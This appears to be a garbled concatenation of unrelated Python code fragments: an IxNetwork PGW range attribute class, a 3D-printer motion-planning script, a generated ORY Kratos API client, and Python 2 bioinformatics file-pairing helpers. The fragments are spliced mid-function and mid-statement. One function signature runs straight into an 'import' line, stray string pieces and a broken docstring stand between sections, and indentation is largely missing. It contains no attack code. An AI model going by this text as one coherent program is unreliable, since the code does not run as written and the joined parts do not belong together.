"""
return self._get_attribute(self._SDM_ATT_MAP['Db_mbrd'])
@Db_mbrd.setter
def Db_mbrd(self, value):
self._set_attribute(self._SDM_ATT_MAP['Db_mbrd'], value)
@property
def Db_mbru(self):
"""
Returns
-------
- number: Maximum bitrate for uplink. For December '09 and December '10 spec versions the maximum value that can be encoded is 1,099,511,627,775 kbps.
"""
return self._get_attribute(self._SDM_ATT_MAP['Db_mbru'])
@Db_mbru.setter
def Db_mbru(self, value):
self._set_attribute(self._SDM_ATT_MAP['Db_mbru'], value)
@property
def Db_pci(self):
"""
Returns
-------
- bool: ARP Preemption Capability
"""
return self._get_attribute(self._SDM_ATT_MAP['Db_pci'])
@Db_pci.setter
def Db_pci(self, value):
self._set_attribute(self._SDM_ATT_MAP['Db_pci'], value)
@property
def Db_pl(self):
"""
Returns
-------
- number: ARP Priority Level
"""
return self._get_attribute(self._SDM_ATT_MAP['Db_pl'])
@Db_pl.setter
def Db_pl(self, value):
self._set_attribute(self._SDM_ATT_MAP['Db_pl'], value)
@property
def Db_pvi(self):
"""
Returns
-------
- bool: ARP Preemption Vulnerability
"""
return self._get_attribute(self._SDM_ATT_MAP['Db_pvi'])
@Db_pvi.setter
def Db_pvi(self, value):
self._set_attribute(self._SDM_ATT_MAP['Db_pvi'], value)
@property
def Db_qci(self):
"""
Returns
-------
- number: QoS Class Identifier
"""
return self._get_attribute(self._SDM_ATT_MAP['Db_qci'])
@Db_qci.setter
def Db_qci(self, value):
self._set_attribute(self._SDM_ATT_MAP['Db_qci'], value)
@property
def DefaultBearerLifetimeTimer(self):
"""
Returns
-------
- number: The time, in seconds, after which the default bearer is deleted
"""
return self._get_attribute(self._SDM_ATT_MAP['DefaultBearerLifetimeTimer'])
@DefaultBearerLifetimeTimer.setter
def DefaultBearerLifetimeTimer(self, value):
self._set_attribute(self._SDM_ATT_MAP['DefaultBearerLifetimeTimer'], value)
@property
def EnableDefaultBearerLifetime(self):
"""
Returns
-------
- bool: If enabled the default bearer will be deleted using the PGW initiated bearer deactivation procedure
"""
return self._get_attribute(self._SDM_ATT_MAP['EnableDefaultBearerLifetime'])
@EnableDefaultBearerLifetime.setter
def EnableDefaultBearerLifetime(self, value):
self._set_attribute(self._SDM_ATT_MAP['EnableDefaultBearerLifetime'], value)
@property
def EnableNIDBCreationDelay(self):
"""
Returns
-------
- bool: Delay Network Initiated Dedicated Bearer(NIDB) Creation
"""
return self._get_attribute(self._SDM_ATT_MAP['EnableNIDBCreationDelay'])
@EnableNIDBCreationDelay.setter
def EnableNIDBCreationDelay(self, value):
self._set_attribute(self._SDM_ATT_MAP['EnableNIDBCreationDelay'], value)
@property
def Enabled(self):
"""
Returns
-------
- bool: Disabled ranges won't be configured nor validated.
"""
return self._get_attribute(self._SDM_ATT_MAP['Enabled'])
@Enabled.setter
def Enabled(self, value):
self._set_attribute(self._SDM_ATT_MAP['Enabled'], value)
@property
def IMSI(self):
"""
Returns
-------
- str: The first International Mobile Subscriber Identifier that will be accepted.
"""
return self._get_attribute(self._SDM_ATT_MAP['IMSI'])
@IMSI.setter
def IMSI(self, value):
self._set_attribute(self._SDM_ATT_MAP['IMSI'], value)
@property
def Ims_apn(self):
"""
Returns
-------
- bool: IMS APN
"""
return self._get_attribute(self._SDM_ATT_MAP['Ims_apn'])
@Ims_apn.setter
def Ims_apn(self, value):
self._set_attribute(self._SDM_ATT_MAP['Ims_apn'], value)
@property
def IpType(self):
"""
Returns
-------
- str: The IP type of the address(es) that will be assigned to the UEs. When choosing IPv4v6 both an IPv4 address and an IPv6 address will be assigned to the UE.
"""
return self._get_attribute(self._SDM_ATT_MAP['IpType'])
@IpType.setter
def IpType(self, value):
self._set_attribute(self._SDM_ATT_MAP['IpType'], value)
@property
def Name(self):
"""
Returns
-------
- str: Name of range
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
@property
def NidbCreationDelay(self):
"""
Returns
-------
- number: Time to wait (in seconds), from the moment the UE is attached, before sending Create Bearer Request for Network Initiated Dedicated Bearers(NIDB). This does not apply to MS Initiated Dedicated Bearers
"""
return self._get_attribute(self._SDM_ATT_MAP['NidbCreationDelay'])
@NidbCreationDelay.setter
def NidbCreationDelay(self, value):
self._set_attribute(self._SDM_ATT_MAP['NidbCreationDelay'], value)
@property
def ObjectId(self):
"""
Returns
-------
- str: Unique identifier for this object
"""
return self._get_attribute(self._SDM_ATT_MAP['ObjectId'])
@property
def ParentPgw(self):
"""
Returns
-------
- str(None | /api/v1/sessions/1/ixnetwork/vport/.../range): Id of parent PGW range
"""
return self._get_attribute(self._SDM_ATT_MAP['ParentPgw'])
@ParentPgw.setter
def ParentPgw(self, value):
self._set_attribute(self._SDM_ATT_MAP['ParentPgw'], value)
@property
def PoolSize(self):
"""
Returns
-------
- number: The number of UEs that will be accepted.
"""
return self._get_attribute(self._SDM_ATT_MAP['PoolSize'])
@PoolSize.setter
def PoolSize(self, value):
self._set_attribute(self._SDM_ATT_MAP['PoolSize'], value)
@property
def PoolStartIPv4(self):
"""
Returns
-------
- str: The first IPv4 address to be assigned to an UE.
"""
return self._get_attribute(self._SDM_ATT_MAP['PoolStartIPv4'])
@PoolStartIPv4.setter
def PoolStartIPv4(self, value):
self._set_attribute(self._SDM_ATT_MAP['PoolStartIPv4'], value)
@property
def PoolStartIPv6(self):
"""
Returns
-------
- str: The first IPv6 address to be assigned to an UE.
"""
return self._get_attribute(self._SDM_ATT_MAP['PoolStartIPv6'])
@PoolStartIPv6.setter
def PoolStartIPv6(self, value):
self._set_attribute(self._SDM_ATT_MAP['PoolStartIPv6'], value)
@property
def PoolStartIp(self):
"""
Returns
-------
- str: Obsolete - use poolStartIPv4 or poolStartIPv6
"""
return self._get_attribute(self._SDM_ATT_MAP['PoolStartIp'])
@PoolStartIp.setter
def PoolStartIp(self, value):
self._set_attribute(self._SDM_ATT_MAP['PoolStartIp'], value)
@property
def RoundRobinDistribution(self):
"""
Returns
-------
- bool: Distribute the IMSIs on the assigned ports in a round-robin manner (E.g.: When having 3 IMSIs to distribute and 2 ports assigned the first IMSI will be distributed on the first port, the second one on the second port and the 3rd one on the first port)
"""
return self._get_attribute(self._SDM_ATT_MAP['RoundRobinDistribution'])
@RoundRobinDistribution.setter
def RoundRobinDistribution(self, value):
self._set_attribute(self._SDM_ATT_MAP['RoundRobinDistribution'], value)
@property
def TotalCount(self):
"""
Returns
-------
- number: Layer 7 Server Count On All Ports
"""
return self._get_attribute(self._SDM_ATT_MAP['TotalCount'])
@TotalCount.setter
def TotalCount(self, value):
self._set_attribute(self._SDM_ATT_MAP['TotalCount'], value)
@property
def UserPlaneIPv4Address(self):
"""
Returns
-------
        - str: The first IPv4 address to be used by the L4-7 server activities.
"""
return self._get_attribute(self._SDM_ATT_MAP['UserPlaneIPv4Address'])
@UserPlaneIPv4Address.setter
def UserPlaneIPv4Address(self, value):
self._set_attribute(self._SDM_ATT_MAP['UserPlaneIPv4Address'], value)
@property
def UserPlaneIPv6Address(self):
"""
Returns
-------
        - str: The first IPv6 address to be used by the L4-7 server activities.
"""
return self._get_attribute(self._SDM_ATT_MAP['UserPlaneIPv6Address'])
@UserPlaneIPv6Address.setter
def UserPlaneIPv6Address(self, value):
self._set_attribute(self._SDM_ATT_MAP['UserPlaneIPv6Address'], value)
@property
def UserPlaneIpAddress(self):
"""
Returns
-------
- str: Obsolete - use userPlaneIPv4Address or userPlaneIPv6Address
"""
return self._get_attribute(self._SDM_ATT_MAP['UserPlaneIpAddress'])
@UserPlaneIpAddress.setter
def UserPlaneIpAddress(self, value):
self._set_attribute(self._SDM_ATT_MAP['UserPlaneIpAddress'], value)
@property
def UserPlaneIpCount(self):
"""
Returns
-------
- number: Layer 7 Server Count Per Port
"""
return self._get_attribute(self._SDM_ATT_MAP['UserPlaneIpCount'])
@UserPlaneIpCount.setter
def UserPlaneIpCount(self, value):
self._set_attribute(self._SDM_ATT_MAP['UserPlaneIpCount'], value)
    def update(self, Apn=None, Apn_AMBRD=None,
import math
# for i in range(10):
# blocks.append({"x":i*10, "y":i*10, "v":minVel})
def solveTimeEq(initialVel, dist, acc):
if dist == 0:
print("solveTimeEq: initialVel", initialVel, "dist", dist, "acc", acc, "time=", 0)
return 0
if acc == 0:
timeA = abs(dist / initialVel)
print("solveTimeEq: initialVel", initialVel, "dist", dist, "acc", acc, "time=", timeA)
return timeA
# Solving this using quadratic formula we get
# timeInBlock = - Uend +/- sqrt(Uend^2 + (2*dist*acceleration)) / acceleration
timeA = (- initialVel + math.sqrt((initialVel * initialVel) + (2 * dist * acc))) / acc
timeB = (- initialVel - math.sqrt((initialVel * initialVel) + (2 * dist * acc))) / acc
print("solveTimeEq: initialVel", initialVel, "dist", dist, "acc", acc, "time=", max(timeA, timeB))
return max(timeA, timeB)
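# Worked example of the equation above: starting from rest (initialVel=0) over dist=5 mm
# with acc=10 mm/s^2, dist = 0.5 * acc * t^2 gives t = sqrt(2 * 5 / 10) = 1.0 s,
# so solveTimeEq(0, 5, 10) returns 1.0.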
def withinBounds(val, minBound, maxBound):
if val < minBound:
return minBound
if val > maxBound:
return maxBound
return val
# Assume the units are mm, mm/sec and mm/sec^2 which is commonly used in 3D printers
class AxisParams:
def __init__(self, minVel = 1, maxVel = 100, maxAcc = 10, maxErr=0.1):
self.minVel = minVel
self.maxVel = maxVel
self.maxAcc = maxAcc
self.maxErr = maxErr
class AxisValue:
def __init__(self, x=0, y=0, z=0):
self.val = [x, y, z]
self.valid = [1, 1, 1]
def set(self, x, y, z):
self.val = [x, y, z]
self.valid = [1, 1, 1]
def toString(self):
return "x {:.2f} y {:.2f} z {:.2f}".format(self.val[0], self.val[1], self.val[2])
def copy(self):
return AxisValue(self.val[0], self.val[1], self.val[2])
class MotionBlock:
def __init__(self, fromPoint, toPoint, entryVel = AxisValue(), exitVel = AxisValue(), acc = AxisValue(), blkTime = 0):
self.frm = fromPoint.copy()
self.to = toPoint.copy()
self.entryVel = entryVel.copy()
self.exitVel = exitVel.copy()
self.acceleration = acc.copy()
self.blkTime = blkTime
def axisDist(self, axisIdx):
return self.to.val[axisIdx] - self.frm.val[axisIdx]
def toString(self):
st = "From/to " + self.frm.toString() + ", " + self.to.toString()
st += " EntryV/exitV " + self.entryVel.toString() + ", " + self.exitVel.toString()
st += " Acc " + self.acceleration.toString()
st += " Time {:.2f}".format(self.blkTime)
return st
def applyConstraints(blocks, loopIdx, workForwards):
print("..........................")
minAxisTimes = [0 for i in range(MAX_AXES)]
if not workForwards:
blkIdx = len(blocks) - 1 - loopIdx
curBlock = blocks[blkIdx]
# Calculate overrun of block on each axis
for axisIdx in range(MAX_AXES):
minAxisTimes[axisIdx] = curBlock.blkTime
axisDist = curBlock.axisDist(axisIdx)
axisEntryVel = curBlock.entryVel.val[axisIdx]
# Is there a change of direction in the current block
if (axisEntryVel >= 0) != (axisDist >= 0):
# Calculate distance travelled away from intended point
timeTravellingWrongDirn = abs(axisEntryVel / axisParams[axisIdx].maxAcc)
# Since the minBlockTime is based on all axes this could overshoot ...
if timeTravellingWrongDirn > curBlock.blkTime:
print("Block", blkIdx, "Axis", axisIdx, "Time travelling in wrong direction > minBlockTime ...",
timeTravellingWrongDirn, ">", curBlock.blkTime)
timeTravellingWrongDirn = curBlock.blkTime
distanceInWrongDirn = abs(axisEntryVel) * timeTravellingWrongDirn \
- 0.5 * axisParams[axisIdx].maxAcc * timeTravellingWrongDirn ** 2
print("Block", blkIdx, "Axis", axisIdx, "Overshoot! time", timeTravellingWrongDirn, "dist",
distanceInWrongDirn)
if distanceInWrongDirn > axisParams[axisIdx].maxErr:
# Calculate max entry vel to fix this problem
maxEntryVel = math.sqrt(abs(2 * axisParams[axisIdx].maxAcc * axisDist))
print("New entry vel", maxEntryVel)
curBlock.entryVel.val[axisIdx] = maxEntryVel
changesMade = True
if blkIdx != 0:
blocks[blkIdx-1].exitVel.val[axisIdx] = maxEntryVel
# Recalculate time for this axis based on any velocity changes
for axisIdx in range(MAX_AXES):
axisDist = curBlock.axisDist(axisIdx)
minAxisTimes[axisIdx] = solveTimeEq(curBlock.entryVel.val[axisIdx], axisDist, curBlock.acceleration.val[axisIdx])
# Find maximum of minTimes for each axis
minBlockTime = 0
for axTime in minAxisTimes:
if minBlockTime < axTime:
minBlockTime = axTime
print("Minimum block time", minBlockTime)
curBlock.blkTime = minBlockTime
# Calculate the acceleration for the block based on any changes to entry velocity, exit velocity, distance and time
for axisIdx in range(MAX_AXES):
axisDist = curBlock.axisDist(axisIdx)
if axisDist != 0:
axisAcc = 2 * (axisDist - curBlock.entryVel.val[axisIdx] * curBlock.blkTime) / curBlock.blkTime**2
# axisAcc = (curBlock.exitVel.val[axisIdx]**2 - curBlock.entryVel.val[axisIdx]**2) / 2 / axisDist
curBlock.acceleration.val[axisIdx] = axisAcc
# timeTravellingWrongDirn = abs(maxEntryVel / axisParams[axisIdx].maxAcc)
# distanceInWrongDirn = abs(maxEntryVel) * timeTravellingWrongDirn \
# - 0.5 * axisParams[axisIdx].maxAcc * timeTravellingWrongDirn ** 2
# print("Block", blkIdx, "Axis", axisIdx, "Overshoot! time", timeTravellingWrongDirn, "dist",
# distanceInWrongDirn)
MAX_AXES = 3
axisParams = [
AxisParams(1, 100, 10, 0.1),
AxisParams(1, 100, 10, 0.1),
AxisParams(1, 100, 10, 0.1)
]
# Length of block (mm) and list of blocks
blkLen = 1
blocks = []
def addBlock(prevBlock, x, y, z):
newBlock = (MotionBlock(prevBlock.to, AxisValue(x, y, z)))
blocks.append(newBlock)
return newBlock
startPos = MotionBlock(AxisValue(0,0,0), AxisValue(0,0,0))
prevBlock = addBlock(startPos, 1, 2, 0)
prevBlock = addBlock(prevBlock, 1, 1, 0)
TEST_AXES = 2
for loopIdx in range(len(blocks)):
blkIdx = loopIdx
curBlock = blocks[blkIdx]
# Get prev block or initial block
if blkIdx > 0:
prevBlock = blocks[blkIdx-1]
else:
prevBlock = startPos
print("..........................")
print("Entry Vel", prevBlock.exitVel.toString())
curBlock.entryVel = prevBlock.exitVel.copy()
# Iterate each axis
minAxisTimes = [0 for i in range(MAX_AXES)]
for axisIdx in range(TEST_AXES):
# distance in the block
axisDist = curBlock.axisDist(axisIdx)
axisEntryVel = curBlock.entryVel.val[axisIdx]
print("Block", blkIdx, "AxisIdx", axisIdx, "From", curBlock.frm.val[axisIdx], "To", curBlock.to.val[axisIdx], "Dist", axisDist)
# Go with max acceleration in the direction of travel
# Also check if velocity is in same direction as travel and, if so, check if we're already at max velocity
# and set acceleration to zero if so
# This neglects the fact that we might accelerate beyond max in this block but hopefully the block is small so
# this won't be a significant overrun
testAcc = axisParams[axisIdx].maxAcc if axisDist >= 0 else -axisParams[axisIdx].maxAcc
if (axisEntryVel >= 0) == (axisDist >= 0):
if abs(axisEntryVel) >= axisParams[axisIdx].maxVel:
testAcc = 0
curBlock.acceleration.val[axisIdx] = testAcc
# Solve the distance equation to get a minimum time for each direction
minAxisTimes[axisIdx] = solveTimeEq(curBlock.entryVel.val[axisIdx], axisDist, testAcc)
print("testAcc", testAcc, "minTime", minAxisTimes[axisIdx])
# Find maximum of minTimes for each axis
minBlockTime = 0
for axTime in minAxisTimes:
if minBlockTime < axTime:
minBlockTime = axTime
print("Minimum block time", minBlockTime)
curBlock.blkTime = minBlockTime
# Now that we know the minimum block time, re-calculate the acceleration and exit velocity
for axisIdx in range(TEST_AXES):
axisEntryVel = curBlock.entryVel.val[axisIdx]
# With known entry velocity, block time and acceleration yield exit velocity
exitVel = axisEntryVel + curBlock.acceleration.val[axisIdx] * minBlockTime
curBlock.exitVel.val[axisIdx] = exitVel
print("Exit Vel", curBlock.exitVel.toString())
# Now repeat backwards
print("-----------------")
print("In reverse")
# Enforce that the exit velocity is zero for the final block in the chain
finalBlock = blocks[len(blocks)-1]
finalBlock.exitVel = AxisValue()
for loopIdx in range(len(blocks)):
    applyConstraints(blocks, loopIdx, False)
# # Calculate overrun of block on each axis
# for axisIdx in range(MAX_AXES):
# axisDist = curBlock.to.axisDist(axisIdx, prevBlock.to)
# axisEntryVel = curBlock.entryVel.val[axisIdx]
# if (axisEntryVel >= 0) != (axisDist >= 0):
# # Calculate distance travelled away from intended point
# timeTravellingWrongDirn = abs(axisEntryVel / axisParams[axisIdx].maxAcc)
# # Since the minBlockTime is based on all axes this could overshoot ...
# if timeTravellingWrongDirn > minBlockTime:
# print("Block", blkIdx, "Axis", axisIdx, "Time travelling in wrong direction > minBlockTime ...", timeTravellingWrongDirn, ">", minBlockTime)
# timeTravellingWrongDirn = minBlockTime
# distanceInWrongDirn = abs(axisEntryVel) * timeTravellingWrongDirn - 0.5 * axisParams[axisIdx].maxAcc * timeTravellingWrongDirn**2
# print("Block", blkIdx, "Axis", axisIdx, "Overshoot! time", timeTravellingWrongDirn, "dist", distanceInWrongDirn)
#
# if distanceInWrongDirn > axisParams[axisIdx].maxErr:
# # Calculate max entry vel to fix this problem
# maxEntryVel = curBlock.entryVel
#
#
# curBlock["accX"] = testAccX
# curBlock["accY"] = testAccY
# curBlock["blockTime"] = blockTime
# blockTime = max(timeX, timeY)
# # Lets say the time in the block a variable quantity
# # and calculate what's the minimum time we can be in the block
# # for each component of direction
# # The distance travelled dist = Uend * timeInBlock - 0.5 * acceleration * timeInBlock^2
# # This will always be a minimum when acceleration is a maximum + or - value
# # Required sign of acceleration = - sign of distance
# accMinTimeX = -maxAccX
# if distX < 0:
# accMinTimeX = maxAccX
# accMinTimeY = -maxAccY
# if distY < 0:
# accMinTimeY = maxAccY
#
# # Solving this using quadratic formula we get
# # timeInBlock = Uend +/- sqrt(Uend^2 - (2*dist*acceleration)) / acceleration
# timeX = solveTimeEq(exitVelX, distX, accMinTimeX)
# timeY = solveTimeEq(exitVelY, distY, accMinTimeY)
# blockTime = max(timeX, timeY)
#
# print("Time=", blockTime)
#
# # Check for zero time or distance
# if blockTime <= 0 or (distX == 0 and distY == 0):
# prevBlock["exitVelX"] = exitVelX
# prevBlock["exitVelY"] = exitVelX
# curBlock["accX"] = 0
'%s'"
" to method complete_self_service_browser_verification_flow" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'request' is set
if self.api_client.client_side_validation and ('request' not in local_var_params or # noqa: E501
local_var_params['request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `request` when calling `complete_self_service_browser_verification_flow`") # noqa: E501
# verify the required parameter 'via' is set
if self.api_client.client_side_validation and ('via' not in local_var_params or # noqa: E501
local_var_params['via'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `via` when calling `complete_self_service_browser_verification_flow`") # noqa: E501
collection_formats = {}
path_params = {}
if 'via' in local_var_params:
path_params['via'] = local_var_params['via'] # noqa: E501
query_params = []
if 'request' in local_var_params and local_var_params['request'] is not None: # noqa: E501
query_params.append(('request', local_var_params['request'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/self-service/browser/flows/verification/{via}/complete', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_schema(self, id, **kwargs): # noqa: E501
"""get_schema # noqa: E501
Get a traits schema definition # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_schema(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID must be set to the ID of schema you want to get (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_schema_with_http_info(id, **kwargs) # noqa: E501
def get_schema_with_http_info(self, id, **kwargs): # noqa: E501
"""get_schema # noqa: E501
Get a traits schema definition # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_schema_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID must be set to the ID of schema you want to get (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(object, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_schema" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_schema`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/schemas/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
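    # Usage sketch (this is a generated OpenAPI client; the Configuration /
    # ApiClient / *Api class names below are assumptions based on the usual
    # openapi-generator layout, not confirmed by this file):
    #
    #   configuration = Configuration(host="http://127.0.0.1:4433")
    #   api_instance = PublicApi(ApiClient(configuration))
    #   schema = api_instance.get_schema("default")                 # synchronous
    #   thread = api_instance.get_schema("default", async_req=True)
    #   schema = thread.get()                                       # async result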
def get_self_service_browser_login_request(self, request, **kwargs): # noqa: E501
"""Get the request context of browser-based login user flows # noqa: E501
This endpoint returns a login request's context with, for example, error details and other information. When accessing this endpoint through ORY Kratos' Public API, ensure that cookies are set as they are required for CSRF to work. To prevent token scanning attacks, the public endpoint does not return 404 status codes. More information can be found at [ORY Kratos User Login and User Registration Documentation](https://www.ory.sh/docs/next/kratos/self-service/flows/user-login-user-registration). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_self_service_browser_login_request(request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str request: Request is the Login Request ID The value for this parameter comes from `request` URL Query parameter sent to your application (e.g. `/login?request=abcde`). (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: LoginRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_self_service_browser_login_request_with_http_info(request, **kwargs) # noqa: E501
def get_self_service_browser_login_request_with_http_info(self, request, **kwargs): # noqa: E501
"""Get the request context of browser-based login user flows # noqa: E501
This endpoint returns a login request's context with, for example, error details and other information. When accessing this endpoint through ORY Kratos' Public API, ensure that cookies are set as they are required for CSRF to work. To prevent token scanning attacks, the public endpoint does not return 404 status codes. More information can be found at [ORY Kratos User Login and User Registration Documentation](https://www.ory.sh/docs/next/kratos/self-service/flows/user-login-user-registration). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_self_service_browser_login_request_with_http_info(request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str request: Request is the Login Request ID The value for this parameter comes from `request` URL Query parameter sent to your application (e.g. `/login?request=abcde`). (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(LoginRequest, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'request'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_self_service_browser_login_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'request' is set
if self.api_client.client_side_validation and ('request' not in local_var_params or # noqa: E501
local_var_params['request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `request` when calling `get_self_service_browser_login_request`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'request' in local_var_params and local_var_params['request'] is not None: # noqa: E501
query_params.append(('request', local_var_params['request'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/self-service/browser/flows/requests/login', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LoginRequest', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_self_service_browser_recovery_request(self, request, **kwargs): # noqa: E501
"""Get the request context of browser-based recovery flows # noqa: E501
When accessing this endpoint through ORY Kratos' Public API, ensure that cookies are set as they are required for checking the auth session. To prevent scanning attacks, the public endpoint does not return 404 status codes but instead 403 or 500. More information can be found at [ORY Kratos Account Recovery Documentation](../self-service/flows/password-reset-account-recovery). # noqa: | |
    ##The target =2 means that as long as files include identifier 2, it will be considered as group 2
    ##the rest will be considered as group 1
    ##The target =1 means that as long as files include identifier 1, it will be considered as group 2
    ##the rest will be considered as group 1
id_list=[]
infiles=[]
paired_dict=dict()
for infile in infiles_combine:
infile_name_list=infile.split('_')
infile_id=infile_name_list[0]
if infile_id not in id_list:
paired_dict[infile_id]=["",""]
id_list.append(infile_id)
else:
pass
if target==2:
identifier=identifier2
elif target==1:
identifier=identifier1
else:
print "Error:Wrong Identifier input"
sys.exit()
for infile in infiles_combine:
infile_name_list=infile.split('_')
infile_id=infile_name_list[0]
#print "identifier2, infile and find result: ", identifier2, infile, infile.find(identifier2)
if infile.find(identifier)>0:
paired_dict[infile_id][1]=infile
else:
paired_dict[infile_id][0]=infile
for id_item in id_list:
infiles.append((paired_dict[id_item][0],paired_dict[id_item][1]))
print "Pair1 and Pair 2 is", paired_dict[id_item][0], paired_dict[id_item][1]
return infiles
def generate_paired_files(infiles_combine,identifier1,identifier2,target=2,unique_ID_length=2,file_name_sep_char="_"):
##the requirement of this function is that both files have the same sample id location
##which is the first position separated by the "_"
##The target =2 means that as long as files include identifier 2, it will be considered as group 2
##the rest will be considered as group 1
##The target =1 means that as long as files include identifier 1, it will be considered as group 2
    ##the rest will be considered as group 1
id_list=[]
infiles=[]
paired_dict=dict()
for infile in infiles_combine:
infile_name_list=infile.split(file_name_sep_char)
for index in range(unique_ID_length):
if index == 0:
infile_id=infile_name_list[index]
else:
infile_id=infile_id+file_name_sep_char+infile_name_list[index]
if infile_id not in id_list:
paired_dict[infile_id]=["",""]
id_list.append(infile_id)
else:
pass
if target==2:
identifier=identifier2
elif target==1:
identifier=identifier1
else:
print "Error:Wrong Identifier input"
sys.exit()
for infile in infiles_combine:
infile_name_list=infile.split(file_name_sep_char)
for index in range(unique_ID_length):
if index == 0:
infile_id=infile_name_list[index]
else:
infile_id=infile_id+file_name_sep_char+infile_name_list[index]
#print "identifier2, infile and find result: ", identifier2, infile, infile.find(identifier2)
if infile.find(identifier)>0:
paired_dict[infile_id][1]=infile
else:
paired_dict[infile_id][0]=infile
for id_item in id_list:
infiles.append((paired_dict[id_item][0],paired_dict[id_item][1]))
print "Pair1 and Pair 2 is", paired_dict[id_item][0], paired_dict[id_item][1]
return infiles
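# Usage sketch (hypothetical file names, not taken from any real data set):
#   infiles = ["S1_rep1_tumor.vcf", "S1_rep1_normal.vcf"]
#   generate_paired_files(infiles, "normal", "tumor", target=2)
#     -> [("S1_rep1_normal.vcf", "S1_rep1_tumor.vcf")]
# With the defaults, the sample ID is the first two "_"-separated fields
# ("S1_rep1"); files containing identifier2 go to position 1 of each tuple,
# the rest to position 0.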
def generate_paired_files_by_ID(infiles_combine,unique_ID_length,vcf_suffix="vcf",bam_suffix="bam",sep_char="_",UNPAIRED_STOP=False):
## this script will pair input files based on equal unique_ID_length
## Version update, provide flexible pairing for the 2 file case
paired_list=list()
if len(infiles_combine)==2:
##quick function
vcf_infile=""
bam_infile=""
for infile in infiles_combine:
